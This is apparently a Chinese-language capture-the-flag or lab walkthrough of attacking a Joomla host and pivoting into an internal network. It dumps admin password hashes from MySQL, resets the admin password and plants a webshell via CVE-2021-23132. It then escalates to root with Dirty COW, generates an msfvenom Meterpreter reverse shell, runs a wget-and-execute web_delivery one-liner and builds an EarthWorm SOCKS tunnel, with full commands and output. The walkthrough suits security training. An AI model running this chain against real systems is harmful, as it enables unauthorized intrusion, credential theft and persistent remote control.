http://192.168.1.21/images/banners[+] Checking apache info/status files
[++] Readable info/status files are not found[+] admin finder
[++] Admin page : http://192.168.1.21/administrator/ [+] Checking robots.txt existing
[++] robots.txt is found
path : http://192.168.1.21/robots.txt Interesting path found from robots.txt
http://192.168.1.21/joomla/administrator/
http://192.168.1.21/administrator/
http://192.168.1.21/bin/
http://192.168.1.21/cache/
http://192.168.1.21/cli/
http://192.168.1.21/components/
http://192.168.1.21/includes/
http://192.168.1.21/installation/
http://192.168.1.21/language/
http://192.168.1.21/layouts/
http://192.168.1.21/libraries/
http://192.168.1.21/logs/
http://192.168.1.21/modules/
http://192.168.1.21/plugins/
http://192.168.1.21/tmp/ [+] Finding common backup files name
[++] Backup files are not found [+] Finding common log files name
[++] error log is not found [+] Checking sensitive config.php.x file
[++] Readable config file is found config file path : http://192.168.1.21/configuration.php~ Your Report : reports/192.168.1.21/
看来行不通,那么现在我们只能远程登录到靶机的MySQL中。
MySQL
1、远程登录
┌──(root㉿ru)-[~]
└─# mysql -u testuser -h 192.168.1.21 -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 4306
Server version: 5.7.27-0ubuntu0.16.04.1 (Ubuntu)Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
+--------------------+
2 rows in set (0.001 sec)2、查看敏感数据
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
+--------------------+
2 rows in set (0.001 sec)MySQL [(none)]> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
MySQL [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla |
+-------------------------------+
| am2zu_action_log_config |
| am2zu_action_logs |
| am2zu_action_logs_extensions |
| am2zu_action_logs_users |
| am2zu_assets |
| am2zu_associations |
| am2zu_banner_clients |
| am2zu_banner_tracks |
| am2zu_banners |
| am2zu_categories |
| am2zu_contact_details |
| am2zu_content |
| am2zu_content_frontpage |
| am2zu_content_rating |
| am2zu_content_types |
| am2zu_contentitem_tag_map |
| am2zu_core_log_searches |
| am2zu_extensions |
| am2zu_fields |
| am2zu_fields_categories |
| am2zu_fields_groups |
| am2zu_fields_values |
| am2zu_finder_filters |
| am2zu_finder_links |
| am2zu_finder_links_terms0 |
| am2zu_finder_links_terms1 |
| am2zu_finder_links_terms2 |
| am2zu_finder_links_terms3 |
| am2zu_finder_links_terms4 |
| am2zu_finder_links_terms5 |
| am2zu_finder_links_terms6 |
| am2zu_finder_links_terms7 |
| am2zu_finder_links_terms8 |
| am2zu_finder_links_terms9 |
| am2zu_finder_links_termsa |
| am2zu_finder_links_termsb |
| am2zu_finder_links_termsc |
| am2zu_finder_links_termsd |
| am2zu_finder_links_termse |
| am2zu_finder_links_termsf |
| am2zu_finder_taxonomy |
| am2zu_finder_taxonomy_map |
| am2zu_finder_terms |
| am2zu_finder_terms_common |
| am2zu_finder_tokens |
| am2zu_finder_tokens_aggregate |
| am2zu_finder_types |
| am2zu_languages |
| am2zu_menu |
| am2zu_menu_types |
| am2zu_messages |
| am2zu_messages_cfg |
| am2zu_modules |
| am2zu_modules_menu |
| am2zu_newsfeeds |
| am2zu_overrider |
| am2zu_postinstall_messages |
| am2zu_privacy_consents |
| am2zu_privacy_requests |
| am2zu_redirect_links |
| am2zu_schemas |
| am2zu_session |
| am2zu_tags |
| am2zu_template_styles |
| am2zu_ucm_base |
| am2zu_ucm_content |
| am2zu_ucm_history |
| am2zu_update_sites |
| am2zu_update_sites_extensions |
| am2zu_updates |
| am2zu_user_keys |
| am2zu_user_notes |
| am2zu_user_profiles |
| am2zu_user_usergroup_map |
| am2zu_usergroups |
| am2zu_users |
| am2zu_utf8_conversion |
| am2zu_viewlevels |
| umnbt_action_log_config |
| umnbt_action_logs |
| umnbt_action_logs_extensions |
| umnbt_action_logs_users |
| umnbt_assets |
| umnbt_associations |
| umnbt_banner_clients |
| umnbt_banner_tracks |
| umnbt_banners |
| umnbt_categories |
| umnbt_contact_details |
| umnbt_content |
| umnbt_content_frontpage |
| umnbt_content_rating |
| umnbt_content_types |
| umnbt_contentitem_tag_map |
| umnbt_core_log_searches |
| umnbt_extensions |
| umnbt_fields |
| umnbt_fields_categories |
| umnbt_fields_groups |
| umnbt_fields_values |
| umnbt_finder_filters |
| umnbt_finder_links |
| umnbt_finder_links_terms0 |
| umnbt_finder_links_terms1 |
| umnbt_finder_links_terms2 |
| umnbt_finder_links_terms3 |
| umnbt_finder_links_terms4 |
| umnbt_finder_links_terms5 |
| umnbt_finder_links_terms6 |
| umnbt_finder_links_terms7 |
| umnbt_finder_links_terms8 |
| umnbt_finder_links_terms9 |
| umnbt_finder_links_termsa |
| umnbt_finder_links_termsb |
| umnbt_finder_links_termsc |
| umnbt_finder_links_termsd |
| umnbt_finder_links_termse |
| umnbt_finder_links_termsf |
| umnbt_finder_taxonomy |
| umnbt_finder_taxonomy_map |
| umnbt_finder_terms |
| umnbt_finder_terms_common |
| umnbt_finder_tokens |
| umnbt_finder_tokens_aggregate |
| umnbt_finder_types |
| umnbt_languages |
| umnbt_menu |
| umnbt_menu_types |
| umnbt_messages |
| umnbt_messages_cfg |
| umnbt_modules |
| umnbt_modules_menu |
| umnbt_newsfeeds |
| umnbt_overrider |
| umnbt_postinstall_messages |
| umnbt_privacy_consents |
| umnbt_privacy_requests |
| umnbt_redirect_links |
| umnbt_schemas |
| umnbt_session |
| umnbt_tags |
| umnbt_template_styles |
| umnbt_ucm_base |
| umnbt_ucm_content |
| umnbt_ucm_history |
| umnbt_update_sites |
| umnbt_update_sites_extensions |
| umnbt_updates |
| umnbt_user_keys |
| umnbt_user_notes |
| umnbt_user_profiles |
| umnbt_user_usergroup_map |
| umnbt_usergroups |
| umnbt_users |
| umnbt_utf8_conversion |
| umnbt_viewlevels |
+-------------------------------+
156 rows in set (0.001 sec)MySQL [joomla]>
MySQL [joomla]> select username,0x3a,password from umnbt_users;
+----------+------+--------------------------------------------------------------+
| username | 0x3a | password |
+----------+------+--------------------------------------------------------------+
| admin | : | $2y$10$N/Yv/9rzxyq.z0gLTT5og.pj3FFAP8Sq2PcBgsMX/Qnc2671qQkHy |
+----------+------+--------------------------------------------------------------+
1 row in set (0.001 sec)MySQL [joomla]> select username,0x3a,password from am2zu_users;
+---------------+------+--------------------------------------------------------------+
| username | 0x3a | password |
+---------------+------+--------------------------------------------------------------+
| administrator | : | $2y$10$.Bke7JJThQfzjwpTlilxx.aCg7CmSYbz358LeqjZZhLDak/vv7EDy |
+---------------+------+--------------------------------------------------------------+
1 row in set (0.001 sec)
使用mysql命令进行修改update am2zu_users set password = md5("root") where id = 891;
在这两个账号的前面有一个super user 的标注。说明这两个账号很可能具有最高权限,我们直接修改administrator 账号的密码为root,当然root一定要加密为MD5值。
登录后台
1、成功登录
全部登录上去,都是用adminstrator用户。
2、RCE漏洞
https://www.cnblogs.com/starci/p/15174896.html
https://www.cnblogs.com/starci/p/15174896.html
点击“option”,修改Path to Files Folder路径为当前路径“./”
可以看到这里可以操作整个web目录下的文件夹及文件,实现了目录遍历。
在这我们通过修改文件进行命令执行。我们尝试另外一种方式。
蚁剑连接
1、写入shell
根据资料收集,默认的执行路径是 http://localhost/templates/beez3/*.php 我们只需要在这里面写入木马即可。
路径就是这样,我们利用后台有的php代码文件进行插入木马。
GitHub - HoangKien1020/CVE-2021-23132: com_media allowed paths that are not intended for image uploads to RCEcom_media allowed paths that are not intended for image uploads to RCE - GitHub - HoangKien1020/CVE-2021-23132: com_media allowed paths that are not intended for image uploads to RCEhttps://github.com/HoangKien1020/CVE-2021-23132
测试成功,接下来就可以进行写马了。
2、disable_functions函数绕过
在蚁剑上使用命令,发现不能使用,经过排查,发现禁用了很多参数。那么只能采用绕过的方式了。可以在github上搜索相应的exp,也可以使用蚁剑的插件,进行 disable_functions 绕过。
GitHub - l3m0n/Bypass_Disable_functions_Shell: 一个各种方式突破Disable_functions达到命令执行的shell一个各种方式突破Disable_functions达到命令执行的shell. Contribute to l3m0n/Bypass_Disable_functions_Shell development by creating an account on GitHub.https://github.com/l3m0n/Bypass_Disable_functions_Shell
上下两个都可以试试。
(www-data:/etc) $ netstat -anlpt
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 192.168.93.120:80 192.168.93.100:44095 ESTABLISHED -
tcp6 0 0 192.168.93.120:80 192.168.93.100:44093 TIME_WAIT -
tcp6 0 0 192.168.93.120:80 192.168.93.100:44094 TIME_WAIT - 我们看到的ip是192.168.93.120,而不是192.168.1.21,说明这里存在一个反向代理,把我们的流量代理到了192.168.93.120这个IP上。现在我们需要去拿下外网主机。说明是IP为192.168.93.100为外网转发流量主机。
我们在tmp目录下找到了test.txt文件。获得了账号以及密码。adduser wwwuser
passwd wwwuser_123AqxSSH连接
┌──(root㉿ru)-[~/lianxi]
└─# ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss wwwuser@192.168.1.21
The authenticity of host '192.168.1.21 (192.168.1.21)' can't be established.
RSA key fingerprint is SHA256:pVIGFsCgpYpKxtt43DtcC9NUBpUvyNCfIitNR9UsPRA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.21' (RSA) to the list of known hosts.
wwwuser@192.168.1.21's password:
Last login: Sun Oct 6 20:24:43 2019 from 192.168.1.122
[wwwuser@localhost ~]$ ls
[wwwuser@localhost ~]$ id
uid=500(wwwuser) gid=500(wwwuser) 组=500(wwwuser) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[wwwuser@localhost ~]$[wwwuser@localhost ~]$ uname -a
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
[wwwuser@localhost ~]$ find / -perm -u=s f 2>/dev/null
[wwwuser@localhost ~]$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/fusermount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/crontab
/usr/bin/sudo
/usr/sbin/usernetctl
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/sbin/pam_timestamp_check
/sbin/unix_chkpwd
[wwwuser@localhost ~]$
脏牛提权复现以及如何得到一个完全交互的shell - 先知社区先知社区,先知安全技术社区https://xz.aliyun.com/t/9757
经过探索,发现主机可以进行内核提权,而且主机的内核在脏牛漏洞的影响范围内。
提权
┌──(root㉿ru)-[~/tools/loudong/zangniu]
└─# php -S 0:8080
[Sat Dec 2 17:53:11 2023] PHP 8.2.7 Development Server (http://0:8080) started[wwwuser@localhost tmp]$ wget http://192.168.1.20:8080/dirty.c
--2019-10-07 10:12:15-- http://192.168.1.20:8080/dirty.c
正在连接 192.168.1.20:8080... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:4815 (4.7K) [text/x-c]
正在保存至: “dirty.c”100%[======================================>] 4,815 --.-K/s in 0s2019-10-07 10:12:15 (21.0 MB/s) - 已保存 “dirty.c” [4815/4815])[wwwuser@localhost tmp]$ ls
dirty.c passwd.bak yum.log
[wwwuser@localhost tmp]$ chmod +x dirty.c
[wwwuser@localhost tmp]$[wwwuser@localhost tmp]$ gcc -pthread dirty.c -o dirty -lcrypt
[wwwuser@localhost tmp]$ ls
dirty dirty.c passwd.bak yum.log
[wwwuser@localhost tmp]$ ./dirty
File /tmp/passwd.bak already exists! Please delete it and run again
[wwwuser@localhost tmp]$ cd /home
[wwwuser@localhost home]$ ls
wwwuser
[wwwuser@localhost home]$ cd wwwuser
[wwwuser@localhost ~]$ ls
[wwwuser@localhost ~]$ cp /tmp/passwd.bak .
[wwwuser@localhost ~]$ ls
passwd.bak
[wwwuser@localhost home]$ cd /tmp[wwwuser@localhost tmp]$ ls
dirty dirty.c passwd.bak yum.log
[wwwuser@localhost tmp]$ rm passwd.bak
[wwwuser@localhost tmp]$ clear
[wwwuser@localhost tmp]$ ls
dirty dirty.c yum.log
[wwwuser@localhost tmp]$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: (ls)
Complete line:
firefart:fiUtQRmTKI0Ek:0:0:pwned:/root:/bin/bashmmap: 7f18ff557000madvise 0ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'ls'.DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
[wwwuser@localhost tmp]$
[wwwuser@localhost tmp]$ ls
dirty dirty.c passwd.bak yum.log
[wwwuser@localhost tmp]$┌──(root㉿ru)-[~/tools/loudong/zangniu]
└─# ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss firefart@192.168.1.21
firefart@192.168.1.21's password:
Last login: Sun Oct 6 20:25:55 2019 from 192.168.1.122
[firefart@localhost ~]# whoami
firefart
[firefart@localhost ~]# cd /root
[firefart@localhost ~]# ls
anaconda-ks.cfg install.log install.log.syslog nginx-1.9.4 nginx-1.9.4.tar.gz
[firefart@localhost ~]# id
uid=0(firefart) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[firefart@localhost ~]# 至此外网打点结束,成功利用脏牛提权。那么下一步只需要进行横向渗透即可。
内网渗透
横向渗透1
1、生成木马文件
msfvenom -p linux/x64/meterpreter/reverse_tcp lhosts=192.168.1.25 lport=1111 SessionCommunication Timeout=0 SessionExpiration Timeout=0 -f elf -o shell.elf使用msfvenom来生成一个 Linux x64 平台上的 Meterpreter 反向 shell。
然后生成的反向 shell 的配置是将 Meterpreter shell 连接到本地 IP 地址为 192.168.1.25,端口为 1111 的目标主机上。
此外,还设置了会话的通信超时和过期超时时间都为 0,这意味着会话将一直保持存活,直到它们被显式终止。-p : 指定payloadlhosts=192.168.1.25 lport=1111 : 指定监听主机SessionCommunication Timeout=0 : 指定会话的通信超时为0SessionExpiration Timeout=0 : 指定会话的过期超时时间为0-f elf : 指定文件得类型-o shell.elf : 指定输出为shell.elf2、开启监听
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show optionsModule options (exploit/multi/handler):Name Current Setting Required Description---- --------------- -------- -----------Payload options (generic/shell_reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------LHOST yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----0 Wildcard TargetView the full module info with the info, or info -d command.lhosts => 192.168.1.25
msf6 exploit(multi/handler) > set lhost 192.168.1.25
lhost => 192.168.1.25
msf6 exploit(multi/handler) > set lport 1111
lport => 1111
msf6 exploit(multi/handler) > show optionsModule options (exploit/multi/handler):Name Current Setting Required Description---- --------------- -------- -----------Payload options (generic/shell_reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------LHOST 192.168.1.25 yes The listen address (an interface may be specified)LPORT 1111 yes The listen portExploit target:Id Name-- ----0 Wildcard TargetView the full module info with the info, or info -d command.msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp[firefart@localhost tmp]# wget http://192.168.1.25/shell.elf
--2019-10-07 11:03:06-- http://192.168.1.25/shell.elf
正在连接 192.168.1.25:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:250 [application/octet-stream]
正在保存至: “shell.elf”100%[======================================>] 250 --.-K/s in 0s2019-10-07 11:03:06 (46.8 MB/s) - 已保存 “shell.elf” [250/250])[firefart@localhost tmp]# ls
dirty dirty.c passwd.bak shell.elf yum.log
[firefart@localhost tmp]# chmod +x shell.elf
[firefart@localhost tmp]# ./shell.elfmsf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.1.25:1111
[*] Sending stage (3045348 bytes) to 192.168.1.21
[*] Meterpreter session 1 opened (192.168.1.25:1111 -> 192.168.1.21:36214) at 2023-12-03 09:17:39 +0800meterpreter > getuid
Server username: firefart3、添加内网路由
查看内网路由meterpreter > run get_local_subnets //查看子网范围[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
Local subnet: 192.168.93.0/255.255.255.0meterpreter > run autoroute -s 192.168.93.0/24 //添加内网路由
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.93.0/255.255.255.0...
[+] Added route to 192.168.93.0/255.255.255.0 via 192.168.1.21
[*] Use the -p option to list all active routesmeterpreter > run autoroute -p //查看当前meterpreter的路由表
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]Active Routing Table
====================Subnet Netmask Gateway------ ------- -------192.168.93.0 255.255.255.0 Session 1横向渗透2
1、建立监听
use exploit(multi/script/web_delivery ......msf6 exploit(multi/script/web_delivery) > set lport 4444
lport => 4444
msf6 exploit(multi/script/web_delivery) > set SRVPORT 80
SRVPORT => 80
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.1.25:4444
[*] Using URL: http://192.168.1.25/0796Iv35A4
msf6 exploit(multi/script/web_delivery) > [*] Server started.
[*] Run the following command on the target machine:
wget -qO msAjJhyl --no-check-certificate http://192.168.1.25/0796Iv35A4; chmod +x msAjJhyl; ./msAjJhyl& disown
[*] 192.168.1.21 web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045348 bytes) to 192.168.1.21
[*] Meterpreter session 4 opened (192.168.1.25:4444 -> 192.168.1.21:41080) at 2023-12-04 08:26:03 +0800msf6 exploit(multi/script/web_delivery) > sessionsActive sessions
===============Id Name Type Information Connection-- ---- ---- ----------- ----------4 meterpreter x64/linux firefart @ localhost.localdomain 192.168.1.25:4444 -> 192.168.1.21:41080 (192.168.1.21)Module options (exploit/multi/script/web_delivery):Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.SRVPORT 80 yes The local port to listen on.SSL false no Negotiate SSL for incoming connectionsSSLCert no Path to a custom SSL certificate (default is randomly generated)URIPATH no The URI to use for this exploit (default is random)Payload options (linux/x64/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------LHOST 192.168.1.25 yes The listen address (an interface may be specified)LPORT 4444 yes The listen portExploit target:Id Name-- ----7 LinuxView the full module info with the info, or info -d command.msf6 exploit(multi/script/web_delivery) >
[firefart@localhost tmp]# wget -qO msAjJhyl --no-check-certificate http://192.168.1.25/0796Iv35A4; chmod +x msAjJhyl; ./msAjJhyl& disown
[1] 123422、进入meterpreter
msf6 exploit(multi/script/web_delivery) > sessionsActive sessions
===============Id Name Type Information Connection-- ---- ---- ----------- ----------4 meterpreter x64/linux firefart @ localhost.localdomain 192.168.1.25:4444 -> 192.168.1.21:41080 (192.168.1.21)msf6 exploit(multi/script/web_delivery) > sessions -i 4
[*] Starting interaction with 4...meterpreter > getuid
Server username: firefart
meterpreter >3、添加内网路由
meterpreter > background
[*] Backgrounding session 4...
msf6 exploit(multi/script/web_delivery) > sessionsActive sessions
===============Id Name Type Information Connection-- ---- ---- ----------- ----------4 meterpreter x64/linu firefart @ localhost. 192.168.1.25:4444 ->x localdomain 192.168.1.21:41080 (192.168.1.21)msf6 exploit(multi/script/web_delivery) >msf6 exploit(multi/script/web_delivery) > route add 192.168.93.0 255.255.255.0 4[*] Route already exists
msf6 exploit(multi/script/web_delivery) ># 目的网段 192.168.93.0 子网掩码 255.255.255.0 下一跳地址 session 44、socks5代理
上述的内网渗透,建立监听操作都是在msfconsole视图下完成的,路由转发只能将msfconsole带进内网,但是想要将攻击机其他程序也带进内网还需要搭建socks代理。使用earthworm搭建socks5反向代理
1、earthworm内网穿透工具
./ew_for_linux64 -s rcsocks -l 9898 -e 6767#将9898端口监听到的本地数据转发到 web服务器的6767端口# 通过9898端口,将本地流量转发出去#rcsocks、rssocks 用于反向连接#ssocks 用于正向连接# -l 指定本地监听的端口# -e 指定要反弹到的机器端口# -d 指定要反弹到机器的IP# -f 指定要主动连接的机器 ip# -g 指定要主动连接的机器端口# -t 指定超时时长,默认为 1000
^C[firefart@localhost tmp]# ls
dirty dirty.c passwd.bak shell.elf yum.log
[firefart@localhost tmp]# wget http://192.168.1.25:8080/ew_for_linux64
--2019-10-07 13:22:27-- http://192.168.1.25:8080/ew_for_linux64
正在连接 192.168.1.25:8080... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:28080 (27K) [application/octet-stream]
正在保存至: “ew_for_linux64”100%[================================================================================================================================================================================================================>] 28,080 --.-K/s in 0.001s2019-10-07 13:22:27 (34.7 MB/s) - 已保存 “ew_for_linux64” [28080/28080])[firefart@localhost tmp]# ls
dirty dirty.c ew_for_linux64 passwd.bak shell.elf yum.log
[firefart@localhost tmp]# chmod +x ew_for_linux64
[firefart@localhost tmp]# ls
dirty dirty.c ew_for_linux64 passwd.bak shell.elf yum.log
[firefart@localhost tmp]#┌──(root㉿ru)-[~/…/neiwang/EarthWorm/download/products]
└─# ./ew_for_linux64 -s rcsocks -l 9898 -e 6767
rcsocks 0.0.0.0:5656 <--[10000 usec]--> 0.0.0.0:6767
init cmd_server_for_rc here
start listen port here
rssocks cmd_socket OK!
[firefart@localhost tmp]# ./ew_for_linux64 -s rssocks -d 192.168.1.25 -e 6767
rssocks 192.168.1.25:6767 <--[10000 usec]--> socks server2、配置proxychains4.conf文件
┌──(root㉿ru)-[~/lianxi]
└─# cat /etc/proxychains4.conf | grep "socks5"
# socks5 192.168.67.78 1080 lamer secret
# proxy types: http, socks4, socks5, raw
#socks5 127.0.0.1 2222
#socks5 116.211.207.100 8080
socks5 127.0.0.1 9898将socks5服务器指向9898端口,然后端口有9898把本地流量转发到6767端口,然后6767端口就会把我们本地流量带到内网中,之后我们就可以利用proxychains将我们的程序代理进入内网了
5、内网主机发现
1、第一种模块
msf6 exploit(multi/script/web_delivery) > use auxiliary/scanner/discovery/udp_probe
msf6 auxiliary(scanner/discovery/udp_probe) > show optionsModule options (auxiliary/scanner/discovery/udp_probe):Name Current Setting Required Description---- --------------- -------- -----------CHOST no The local client addressRHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlTHREADS 1 yes The number of concurrent threads (max one per host)View the full module info with the info, or info -d command.msf6 auxiliary(scanner/discovery/udp_probe) > set rhost 192.168.93.0-255
rhost => 192.168.93.0-255
msf6 auxiliary(scanner/discovery/udp_probe) > set THREADS 5
THREADS => 5
msf6 auxiliary(scanner/discovery/udp_probe) >msf6 auxiliary(scanner/discovery/udp_probe) > run[-] Unknown error: 192.168.93.0:5632 Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1 ["/usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb:38:in `open'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:143:in `create_udp_channel'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:96:in `create'", "/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket.rb:51:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:39:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:30:in `create'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:76:in `block in run_host'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `each'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'"]
[+] Discovered DNS on 192.168.93.10:53 (Microsoft DNS)
[+] Discovered NetBIOS on 192.168.93.10:137 (WIN-8GA56TNV3MV:<00>:U :TEST:<00>:G :TEST:<1c>:G :WIN-8GA56TNV3MV:<20>:U :TEST:<1b>:U :00:0c:29:1f:54:d2)
[+] Discovered NTP on 192.168.93.10:123 (1c0104fa00000000000a16634c4f434ce9179267a83fa2adc54f234b71b152f3e917aaa60c16aceae917aaa60c16acea)
[+] Discovered NetBIOS on 192.168.93.20:137 (WIN2008:<00>:U :TEST:<00>:G :WIN2008:<20>:U :00:0c:29:ab:44:ec)
[+] Discovered MSSQL on 192.168.93.20:1434 (ServerName=WIN2008 InstanceName=MSSQLSERVER IsClustered=No Version=10.0.1600.22 tcp=1433 )
[*] Scanned 26 of 256 hosts (10% complete)
[+] Discovered NetBIOS on 192.168.93.30:137 (WIN7:<20>:U :WIN7:<00>:U :TEST:<00>:G :TEST:<1e>:G :TEST:<1d>:U :__MSBROWSE__:<01>:G :00:0c:29:e0:74:2b)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 77 of 256 hosts (30% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[-] Unknown error: 192.168.93.255:5632 Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1 ["/usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb:38:in `open'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:143:in `create_udp_channel'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:96:in `create'", "/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket.rb:51:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:39:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:30:in `create'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:76:in `block in run_host'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `each'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'"]
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed扫描到三台内网主机192.168.93.10
192.168.93.20
192.168.93.302、第二种模块
msf6 auxiliary(scanner/discovery/udp_probe) > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show optionsModule options (auxiliary/scanner/smb/smb_version):Name Current Setting Required Description---- --------------- -------- -----------RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlTHREADS 1 yes The number of concurrent threads (max one per host)View the full module info with the info, or info -d command.msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.93.0-255
rhosts => 192.168.93.0-255
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 5
THREADS => 5
msf6 auxiliary(scanner/smb/smb_version) > run[-] 192.168.93.0:445 - 192.168.93.0: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.0:139 - 192.168.93.0: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.1:445 - 192.168.93.1: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.2:445 - 192.168.93.2: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.4:445 - 192.168.93.4: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.3:445 - 192.168.93.3: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.5:445 - 192.168.93.5: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.1:139 - 192.168.93.1: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.2:139 - 192.168.93.2: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
